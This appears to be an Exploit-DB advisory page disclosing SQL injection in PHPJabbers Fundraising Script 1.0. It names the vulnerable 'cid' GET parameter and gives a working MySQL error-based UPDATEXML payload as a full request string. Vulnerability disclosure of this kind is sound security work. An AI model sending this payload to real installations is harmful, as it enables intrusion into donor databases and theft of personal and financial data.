Fundraising Script 1.0 - SQLi

EDB-ID:

51753

CVE:

N/A

EDB Verified:

Author:

nu11secur1ty

Type:

webapps

Exploit:   /  

Platform:

PHP

Date:

2024-01-29

Vulnerable App: 
## Title: Fundraising Script-1.0 SQLi
## Author: nu11secur1ty
## Date: 09/13/2023
## Vendor: https://www.phpjabbers.com/
## Software: https://www.phpjabbers.com/fundraising-script/#sectionDemo
## Reference: https://portswigger.net/web-security/sql-injection

## Description:
The `cid` parameter appears to be vulnerable to SQL injection attacks.
The payload ' was submitted in the cid parameter, and a database error
message was returned.
The database is empty, but if it is not, this will be over for the
money of the donors and their bank accounts!
The attacker can steal all information from the database!

[+]Payload:
mysql

Parameter: cid (GET)
    Type: error-based
    Title: MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)
    Payload: controller=pjFront&action=pjActionLoadCampaign&cid=(UPDATEXML(1741,CONCAT(0x2e,0x71626b7071,(SELECT
(ELT(1741=1741,1))),0x7162787171),3873))

https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Fundraising-Script-1.0

System Administrator - Infrastructure Engineer
Penetration Testing Engineer
nu11secur1ty <http://nu11secur1ty.com/>
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services